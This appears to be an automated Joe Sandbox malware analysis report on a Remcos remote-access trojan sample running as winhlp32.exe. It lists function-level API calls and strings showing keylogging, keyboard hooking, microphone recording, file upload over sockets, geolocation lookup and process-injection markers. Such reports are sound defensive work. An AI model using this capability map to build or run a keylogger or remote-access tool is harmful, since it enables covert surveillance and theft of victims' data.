                                    • API ID: File$CreateDeleteExecuteShellSleep
                                    • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                    • API String ID: 1462127192-2001430897
                                    • Opcode ID: 1f6a825730162cc8d70e4a327bcc3a42f02bec4a5cc2bca23683888e0af1c848
                                    • Instruction ID: 51d64fe7c8a5c54eac4555a52c350958ac4104e8f54c8767ba2a87230734c78e
                                    • Opcode Fuzzy Hash: 1f6a825730162cc8d70e4a327bcc3a42f02bec4a5cc2bca23683888e0af1c848
                                    • Instruction Fuzzy Hash: 1431307194011A9ADB04FB62DC96DED7779AF50309F40017EF606730E2EF785A8ACA9C
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004073AC Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 99COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetCurrentProcess.KERNEL32(00472B14,00000000,004752D8,00003000,00000004,00000000,00000001), ref: 004073DD
                                    • GetCurrentProcess.KERNEL32(00472B14,00000000,00008000,?,00000000,00000001,00000000,00407656,C:\Windows\winhlp32.exe), ref: 0040749E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CurrentProcess
                                    • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                                    • API String ID: 2050909247-4242073005
                                    • Opcode ID: 539e8bced36223118afef646be0064b2910b8cfba0236f50484b60453eb32d25
                                    • Instruction ID: f630994b7aed3d2c1b9b8fa2b3e4f68b22e8b08ead4833dea6669ff7d567ef23
                                    • Opcode Fuzzy Hash: 539e8bced36223118afef646be0064b2910b8cfba0236f50484b60453eb32d25
                                    • Instruction Fuzzy Hash: 7031A471A04700ABD321FF65ED46F167BB8AB44305F10087EF515A6292E7B8B8448B6F
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00401BE9 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 71COMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BF9
                                    • waveInOpen.WINMM(00472AC0,000000FF,00472AA8,Function_00001D0B,00000000,00000000,00000024), ref: 00401C8F
                                    • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CE3
                                    • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CF2
                                    • waveInStart.WINMM ref: 00401CFE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                    • String ID: dMG$|MG$PG
                                    • API String ID: 1356121797-532278878
                                    • Opcode ID: f0413ad6b7edbe83be065844dac3f0d77922414ea45c2d30098e63d2db50c4df
                                    • Instruction ID: ba088f7df0b955e0db37e5e5e2d8d6799d5f59e9c832501e8260ac80857d70f0
                                    • Opcode Fuzzy Hash: f0413ad6b7edbe83be065844dac3f0d77922414ea45c2d30098e63d2db50c4df
                                    • Instruction Fuzzy Hash: 53212A71604201AFC739DF6AEE15A6A7BB6FB94715B00803FA10DD76B1DBB84881CB5C
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0041D45D Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 48windowstringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D476
                                      • Part of subcall function 0041D50F: RegisterClassExA.USER32(00000030), ref: 0041D55B
                                      • Part of subcall function 0041D50F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D576
                                      • Part of subcall function 0041D50F: GetLastError.KERNEL32 ref: 0041D580
                                    • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D4AD
                                    • lstrcpynA.KERNEL32(00474B60,Remcos,00000080), ref: 0041D4C7
                                    • Shell_NotifyIconA.SHELL32(00000000,00474B48), ref: 0041D4DD
                                    • TranslateMessage.USER32(?), ref: 0041D4E9
                                    • DispatchMessageA.USER32(?), ref: 0041D4F3
                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041D500
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                    • String ID: Remcos
                                    • API String ID: 1970332568-165870891
                                    • Opcode ID: e379e7694b2aceffa08d25cf1e7e1f0c4c43df4e14370d432b5b71655a4afb2b
                                    • Instruction ID: 4ccd8a34d55b2cf311069b5b9598b364b65d9d4e2968dcdf9eb94a5ca0393a4d
                                    • Opcode Fuzzy Hash: e379e7694b2aceffa08d25cf1e7e1f0c4c43df4e14370d432b5b71655a4afb2b
                                    • Instruction Fuzzy Hash: AC015271800245EBD7109FA5EC4CFEABB7CEB85705F004026F515930A1D778E885CB98
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00445179 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                                      • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                      • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                                      • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                    • _memcmp.LIBVCRUNTIME ref: 00445423
                                    • _free.LIBCMT ref: 00445494
                                    • _free.LIBCMT ref: 004454AD
                                    • _free.LIBCMT ref: 004454DF
                                    • _free.LIBCMT ref: 004454E8
                                    • _free.LIBCMT ref: 004454F4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free$ErrorLast$_abort_memcmp
                                    • String ID: C
                                    • API String ID: 1679612858-1037565863
                                    • Opcode ID: 3b59ec677d4d175c50db296303e2411e5fb3dbfaa0361dba4d40d6cf04aba7d4
                                    • Instruction ID: 551747f29a431029642ca2aca46be5bbca0cbe6c77a4b2ed9ddfbf6361621c56
                                    • Opcode Fuzzy Hash: 3b59ec677d4d175c50db296303e2411e5fb3dbfaa0361dba4d40d6cf04aba7d4
                                    • Instruction Fuzzy Hash: B2B13975A016199BEB24DF18C884BAEB7B4FF08308F5045EEE949A7351E774AE90CF44
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0041490A Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 225COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: tcp$udp
                                    • API String ID: 0-3725065008
                                    • Opcode ID: 856ac91ac91911106c473792f8c7d8f31027b78cae10ba96d9f0cbb069fdbf0d
                                    • Instruction ID: c6aeaafd44a905d145cb4251883953767b251f71b123717361be5a5837da4da2
                                    • Opcode Fuzzy Hash: 856ac91ac91911106c473792f8c7d8f31027b78cae10ba96d9f0cbb069fdbf0d
                                    • Instruction Fuzzy Hash: 637177B06083028FDB24CF65C480BABB7E4AFD4395F15442FF88986351E778DD858B9A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040186A Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 142threadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • __Init_thread_footer.LIBCMT ref: 004018BE
                                    • ExitThread.KERNEL32 ref: 004018F6
                                    • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00474EE0,00000000), ref: 00401A04
                                      • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                    • String ID: PkG$XMG$NG$NG
                                    • API String ID: 1649129571-3151166067
                                    • Opcode ID: f03e1696385eff321045f3fd04ccd2f00e10c82d765726f3dffbcfbdf912789a
                                    • Instruction ID: 5b8630810f78da979eb204bf693be1d55f2004797ab3201abec5cd50ea38d472
                                    • Opcode Fuzzy Hash: f03e1696385eff321045f3fd04ccd2f00e10c82d765726f3dffbcfbdf912789a
                                    • Instruction Fuzzy Hash: BF41B4312042109BC324FB26DD96ABE73A6AB85314F00453FF54AA61F2DF386D49C75E
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00407963 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,00474EE0,00465FA4,?,00000000,00407FFC,00000000), ref: 004079C5
                                    • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,00407FFC,00000000,?,?,0000000A,00000000), ref: 00407A0D
                                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                    • CloseHandle.KERNEL32(00000000,?,00000000,00407FFC,00000000,?,?,0000000A,00000000), ref: 00407A4D
                                    • MoveFileW.KERNEL32(00000000,00000000), ref: 00407A6A
                                    • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407A95
                                    • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AA5
                                      • Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(?,000000FF,?,00474EF8,00404C49,00000000,?,?,?,00474EF8,?), ref: 00404BA5
                                      • Part of subcall function 00404B96: SetEvent.KERNEL32(?), ref: 00404BC3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                    • String ID: .part
                                    • API String ID: 1303771098-3499674018
                                    • Opcode ID: 3af979d2a86f55abb037a5ea190009b8bddef8696a723389280064d929b35107
                                    • Instruction ID: 3872d967715c28256f57216ae0d43a20e9ded80e7ed52efebe816600842ab993
                                    • Opcode Fuzzy Hash: 3af979d2a86f55abb037a5ea190009b8bddef8696a723389280064d929b35107
                                    • Instruction Fuzzy Hash: 7F318371508341AFC210EB21DC4599FB7A8FF94359F00493EB545A2192EB78EE48CB9A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040A2B8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A2D3
                                    • SetWindowsHookExA.USER32(0000000D,0040A2A4,00000000), ref: 0040A2E1
                                    • GetLastError.KERNEL32 ref: 0040A2ED
                                      • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040A33B
                                    • TranslateMessage.USER32(?), ref: 0040A34A
                                    • DispatchMessageA.USER32(?), ref: 0040A355
                                    Strings
                                    • Keylogger initialization failure: error , xrefs: 0040A301
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                    • String ID: Keylogger initialization failure: error
                                    • API String ID: 3219506041-952744263
                                    • Opcode ID: 4f13040d40fce51975cfbbc3673976c4dad95410904dfe41d9466c849e225161
                                    • Instruction ID: 26c2bdf112627336efb266b6f5317542b4ef4d62b82d8858756ad59ca9dca42a
                                    • Opcode Fuzzy Hash: 4f13040d40fce51975cfbbc3673976c4dad95410904dfe41d9466c849e225161
                                    • Instruction Fuzzy Hash: FA11BF32604301ABCB107F76DC0A86B77ECEA95716B10457EFC85E21D1EA38C910CBAA
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040A3E0 Relevance: 12.1, APIs: 8, Instructions: 112keyboardthreadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetForegroundWindow.USER32 ref: 0040A416
                                    • GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A422
                                    • GetKeyboardLayout.USER32(00000000), ref: 0040A429
                                    • GetKeyState.USER32(00000010), ref: 0040A433
                                    • GetKeyboardState.USER32(?), ref: 0040A43E
                                    • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A461
                                    • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4C1
                                    • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A4FA
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                    • String ID:
                                    • API String ID: 1888522110-0
                                    • Opcode ID: 4ba0a60493bf1cb7a04a280161e9af6e0206db9f66fbe83c406a8642f04fa518
                                    • Instruction ID: 5ff565fa5b8df07833abad56ec5ecbabe923af01fc99f1944a330f9e709d98a3
                                    • Opcode Fuzzy Hash: 4ba0a60493bf1cb7a04a280161e9af6e0206db9f66fbe83c406a8642f04fa518
                                    • Instruction Fuzzy Hash: AE316D72504308FFD710DF94DC45F9BB7ECAB88705F01083AB645D61A0E7B5E9488BA6
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00419993 Relevance: 12.1, APIs: 8, Instructions: 102keyboardCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 004199CC
                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004199ED
                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A0D
                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A21
                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A37
                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00419A54
                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00419A6F
                                    • SendInput.USER32(00000001,?,0000001C,?,00000000), ref: 00419A8B
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: InputSend
                                    • String ID:
                                    • API String ID: 3431551938-0
                                    • Opcode ID: f95364bfe09dcd8f200507449a759ee15de787b6f4e4bd27b79311205e9f388b
                                    • Instruction ID: babcb3f23bbfeda7ed9031f98f3524dfd9ae94bb4b0c65128b251ed995bccade
                                    • Opcode Fuzzy Hash: f95364bfe09dcd8f200507449a759ee15de787b6f4e4bd27b79311205e9f388b
                                    • Instruction Fuzzy Hash: CE31B471558349AEE310CF51DC41BEBBBDCEF98B54F00080FF6808A181D2A6A9C88B97
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00447571 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 389COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: __freea$__alloca_probe_16_free
                                    • String ID: a/p$am/pm$zD
                                    • API String ID: 2936374016-2723203690
                                    • Opcode ID: ad0e661e8ca139f4988ec10911a06b569de76af7a8f23a444d27c6a0fba4a5cb
                                    • Instruction ID: 9fbfa546a4d6e8c17a1525f8bb1fcc11d6b56032d3bbc67104e2604220ae0e85
                                    • Opcode Fuzzy Hash: ad0e661e8ca139f4988ec10911a06b569de76af7a8f23a444d27c6a0fba4a5cb
                                    • Instruction Fuzzy Hash: 6AD1D1B1918206CAFB249F68C845ABBB7B1FF05310F28415BE545AB351D33D9D43CBA9
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00449190 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • _free.LIBCMT ref: 00449212
                                    • _free.LIBCMT ref: 00449236
                                    • _free.LIBCMT ref: 004493BD
                                    • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F234), ref: 004493CF
                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 00449447
                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 00449474
                                    • _free.LIBCMT ref: 00449589
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                    • String ID:
                                    • API String ID: 314583886-0
                                    • Opcode ID: e51e2b160430e069a94018d2a40d83d225257a5f61c10d126208887eb2308fed
                                    • Instruction ID: 779aab753f07af14b01adf3fce5c8211df4e7f9331a35af1166ddbde82723190
                                    • Opcode Fuzzy Hash: e51e2b160430e069a94018d2a40d83d225257a5f61c10d126208887eb2308fed
                                    • Instruction Fuzzy Hash: CAC15771900205ABFB24DF69CC41AAFBBA8EF46314F1405AFE89497381E7788E42D758
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00413A55 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 179registryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413ABC
                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413AEB
                                    • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 00413B8B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Enum$InfoQueryValue
                                    • String ID: [regsplt]$xUG$TG
                                    • API String ID: 3554306468-1165877943
                                    • Opcode ID: e28986e9332aa07a6eea5a33b9e26ecc66a365c7f4eba0dbebaa861638ff76d3
                                    • Instruction ID: b9c9d149d6e4de0395087b00820169330fa190b61d8fc59f93bff107e3475f49
                                    • Opcode Fuzzy Hash: e28986e9332aa07a6eea5a33b9e26ecc66a365c7f4eba0dbebaa861638ff76d3
                                    • Instruction Fuzzy Hash: E5511D72900219AADB11EB95DC85EEFB77DAF04305F10007AF505F6191EF786B48CBA9
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00456C1A Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 152COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free
                                    • String ID: D[E$D[E
                                    • API String ID: 269201875-3695742444
                                    • Opcode ID: bc4a191701c62eeb9847f09c94d148ade9b95fc5d58c951cd89fb7ba37de2388
                                    • Instruction ID: e1ec1e089ae9cf4c30c2343e7c59e1c9a5dba52e91c7d03f0b1416238821c5a9
                                    • Opcode Fuzzy Hash: bc4a191701c62eeb9847f09c94d148ade9b95fc5d58c951cd89fb7ba37de2388
                                    • Instruction Fuzzy Hash: 7A415B31A001046BEB216BBA8C4566F3BB4EF41336F96061BFC24D7293DA7C880D566D
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0045112C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 110COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • MultiByteToWideChar.KERNEL32(?,00000000,000000FF,?,00000000,00000000,0043F8C8,?,00000000,?,00000001,?,000000FF,00000001,0043F8C8,?), ref: 00451179
                                    • __alloca_probe_16.LIBCMT ref: 004511B1
                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00451202
                                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00451214
                                    • __freea.LIBCMT ref: 0045121D
                                      • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                    • String ID: PkGNG
                                    • API String ID: 313313983-263838557
                                    • Opcode ID: bce85a8c1b82420839f42ccd06a1f385e5b5f24b7ce490b3fee2b1b7615d4ae7
                                    • Instruction ID: 2862a929c21554b3885a63a70f5d1b49ed21d23a3953ed9914841bfcf42aa681
                                    • Opcode Fuzzy Hash: bce85a8c1b82420839f42ccd06a1f385e5b5f24b7ce490b3fee2b1b7615d4ae7
                                    • Instruction Fuzzy Hash: 6631D271A0020AABDF24DFA5DC41EAF7BA5EB04315F0445AAFC04D72A2E739CD55CB94
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0041B68A Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 91COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0041361B: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?,004750E4), ref: 0041363D
                                      • Part of subcall function 0041361B: RegQueryValueExW.ADVAPI32(?,0040F313,00000000,00000000,?,00000400), ref: 0041365C
                                      • Part of subcall function 0041361B: RegCloseKey.ADVAPI32(?), ref: 00413665
                                      • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                                    • _wcslen.LIBCMT ref: 0041B763
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                                    • String ID: .exe$8SG$http\shell\open\command$program files (x86)\$program files\
                                    • API String ID: 37874593-122982132
                                    • Opcode ID: 2f5c0ff3d6ea7972f87a7f3e3c7ffac37502a487daadfbe7cd55c680b7f4a926
                                    • Instruction ID: 0af867b59be632d30c611c6dccf556baefac66a2e67262e696d3f692bc65d575
                                    • Opcode Fuzzy Hash: 2f5c0ff3d6ea7972f87a7f3e3c7ffac37502a487daadfbe7cd55c680b7f4a926
                                    • Instruction Fuzzy Hash: 6721A472A002086BDB14BAB58CD6AFE766D9B85328F14043FF405B72C2EE7C9D494269
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00456B53 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 273ab8544d097714f5f9861dee4502037fec93a611cdb24e761043779f074d75
                                    • Instruction ID: 6cb1fb7365923ae9cd4386fa22a0d7cc2d4bdc50975796c61f51bb0de8f74700
                                    • Opcode Fuzzy Hash: 273ab8544d097714f5f9861dee4502037fec93a611cdb24e761043779f074d75
                                    • Instruction Fuzzy Hash: B9110272504214BAEB216F728C0496F3AACEF85326B52422BFD11C7252DE38CC41CAA8
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0041B380 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69networkfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B3A7
                                    • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B3BD
                                    • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B3D6
                                    • InternetCloseHandle.WININET(00000000), ref: 0041B41C
                                    • InternetCloseHandle.WININET(00000000), ref: 0041B41F
                                    Strings
                                    • http://geoplugin.net/json.gp, xrefs: 0041B3B7
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$CloseHandleOpen$FileRead
                                    • String ID: http://geoplugin.net/json.gp
                                    • API String ID: 3121278467-91888290
                                    • Opcode ID: 93fb62275c9c30ece467367bc9d260af9d028c0859994e7c2f4e10a89ee4ed45
                                    • Instruction ID: bc766ab0241d3587a1949f89688fbc1c60562a782fd7f61c1deed4db1e92f461
                                    • Opcode Fuzzy Hash: 93fb62275c9c30ece467367bc9d260af9d028c0859994e7c2f4e10a89ee4ed45
                                    • Instruction Fuzzy Hash: E711EB311053126BD224AB269C49EBF7F9CEF86755F00043EF905A2292DB68DC45C6FA
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00411163 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                    Download Yara Rule
                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00411170
                                    • int.LIBCPMT ref: 00411183
                                      • Part of subcall function 0040E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 0040E0D2
                                      • Part of subcall function 0040E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E0EC
                                    • std::_Facet_Register.LIBCPMT ref: 004111C3
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 004111CC
                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 004111EA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                    • String ID: (mG
                                    • API String ID: 2536120697-4059303827
                                    • Opcode ID: 34a51a48ebffab58c1c893f3ae79879d0a70666fb45cbfefdea1ee74b3510b9f
